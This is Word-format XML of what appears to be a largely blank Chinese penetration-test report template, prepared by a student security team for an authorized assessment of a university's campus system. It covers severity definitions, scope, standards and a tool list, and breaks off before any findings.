        <w:tblW w:w="861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1"/>
        <w:gridCol w:w="7352"/>
      </w:tblGrid>
      <w:tr w14:paraId="517370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2" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8613" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="8EAADB" w:themeFill="accent5" w:themeFillTint="99"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="72B214CB">
            <w:pPr>
              <w:pStyle w:val="47"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全风险状况说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06D8CE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93" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="551F9D03">
            <w:pPr>
              <w:pStyle w:val="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>低危漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77C8EBE7">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对系统造成较小的影响，攻击成本高，攻击场景较为苛刻，不会直接影响到系统的正常运行，攻击者可能无法通过该漏洞获得权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3F401B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23" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A8DDA1A">
            <w:pPr>
              <w:pStyle w:val="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:color w:val="FF6600"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFC000"/>
              </w:rPr>
              <w:t>中危漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FE38E8B">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对系统造成一般的影响，攻击成本一般，在特定场景下将可影响系统的正常运行，攻击者需要配合其他安全漏洞方可间接获得权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F1E0F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408" w:hRule="atLeast"/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1261" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="12" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B65EC33">
            <w:pPr>
              <w:pStyle w:val="94"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>高危漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7352" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="12" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A21D124">
            <w:pPr>
              <w:pStyle w:val="40"/>
              <w:wordWrap/>
              <w:spacing w:line="300" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对系统造成严重的影响，攻击成本低，一般情况下可直接利用而无需特定场景和要求，攻击者可直接利用该漏洞获得权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77B89CD2">
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:wordWrap/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120914E7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">辽宁工业大学xx月渗透测试报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">——xxxx系统</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">（周期测试）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">大学生探索网网络安全团队</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">xxxx年xx月xx日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">文档信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 项目名称 | 辽宁工业大学xx月渗透测试  | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 文档名称 | 辽宁工业大学_xxxx系统_渗透测试报告  | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 文档编号 |   | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 文件类型 | 项目文档_周期测试  | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 创 建 人 |  | 版本 |   | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 审 核 人 |  | 审核日期 |   | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 批 准 人 |  | 批准日期 |   | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 接 收 方 | 辽宁工业大学智慧校园建设中心 | 接收日期 |   | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">修订记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |   | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 版本 | 状态 | 修订内容摘要 | 修改人员 | 批准人 | 修订日期 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 1 | C |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">状态：C-创建，A-增加，M-修改，D-删除</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.1 测评团队简介	4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.2 项目信息	4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">二. 项目信息	5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2.1 委托单位信息	5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2.2 测评团队信息	5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">三. 项目概述	6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3.1 测试目的	6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3.2 测试范围	6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3.3 测试依据	6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3.4 测试工具	xx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">四. 问题归纳	8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4.1 Web安全	8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4.1.1	8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4.2 弱口令风险	9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4.2.1 MYSQL	9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">五. 安全风险总结	11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">5.1 安全概况	11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">5.2 安全管理方面	11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">5.3 安全技术方面	11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">5.4 开发过程管理	11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">5.5 安全架构设计基本原则	13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">附录A 安全风险状况等级说明	15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">附录B 漏洞等级状况说明	16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |   | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 目录  | | | | | | | | | | | | | | | | | | | | | | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 一. 摘要	4 |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">摘要</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">测评团队简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">大学生探索网网络安全团队（LNUTTSW），隶属于辽宁工业大学智慧校园建设中心大学生探索网学生创新团队。团队始创于2016年9月，秉承着“实践 创新 探索 发展”的口号在2016年至2019年连续四年获得全国高校网络信息安全运维挑战赛东北赛区三等奖；2018年至2022年连续四年荣获网络安全技能大赛二等奖及三等奖；2023年至2024年连续两年荣获ISCC全国二等奖及全国三等奖；近年来承接锦州市公安局，辽宁省公安厅，国家公安部，国家教育部等组织的网络安全攻防演练中屡创佳绩。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">项目信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">经辽宁工业大学智慧校园建设中心授权，大学生探索网网络安全团队于xxxx-xx-xx至xxxx-xx-xx对校跑系统进行了安全渗透测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">经过测试发现校跑系统存在安全漏洞xx个。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">项目信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">委托单位信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 单位名称 | 辽宁工业大学智慧校园建设中心  | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 委托项目名称 | 辽宁工业大学xx月渗透测试  | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 单位地址 |   | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 联系人 |  | 联系电话 |   | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">测评团队信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|   |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 团队名称 | 大学生探索网网络安全团队LNUTTSW |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 测试负责人 |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 参与本次测试小组成员有： |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">项目概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">测试目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">通过本项目的成功实施，在坚持科学、客观、公正原则的基础上，全面、完整地了解统校跑系统当前的安全状况，分析系统所面临的各种风险，模拟攻击者可能利用的漏洞，根据测试结果发现系统存在的安全问题，并对严重的问题提出加固的建议。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">本次测试预期达到的目标为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">发现授权渗透测试目标系统的安全漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">针对发现的漏洞提供加固方案及防护建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">测试范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">本次渗透测试的范围如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |  |  |  |  |  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 序 号 | 名 称 | 备 注  | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 1 | 校跑系统 | card.lnut.edu.cn  | | | | | | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">测试依据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">安全测试服务将参考下列规范进行工作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">信息安全技术 信息安全风险评估规范（GB/T 20984-200xx）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">信息技术 信息安全管理实用规则（GB/T 19xx16-2005)(ISO/IEC 1xxxx99:2000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">信息技术 安全技术 信息安全管理实用规则（GB/T 22081-2016 ）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">GB T 31509-2015 信息安全技术 信息安全风险评估实施指南</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">信息系统审计标准（ISACA）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">OWASP OWASP_Testing_Guide_v3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">OWASP OWASP_Development_Guide_2005</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">OWASP OWASP_Top_10_2010_Chinese_V1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">GB∕T 302xx9-2020 信息安全技术 网络安全漏洞分类分级指南</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">GB∕T 3xx931-2019 信息安全技术 Web应用安全检测系统安全技术要求和测试评价方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">测试工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">拓扑分析工具：DNS Sweep、Nslookup 等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">自动化扫描工具：Nessus、AIScanner 等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">端口扫描、服务检测：Nmap、SuperScan 等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">嗅探分析工具：Ethereal、Entercap、Dsniff 等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Exploiting 利用工具：Metasploit Framework 等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">应用缺陷分析工具：Gatling自动化渗透测试系统、SQLMAP 等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">静态分析工具：MobSF等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">问题归纳</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
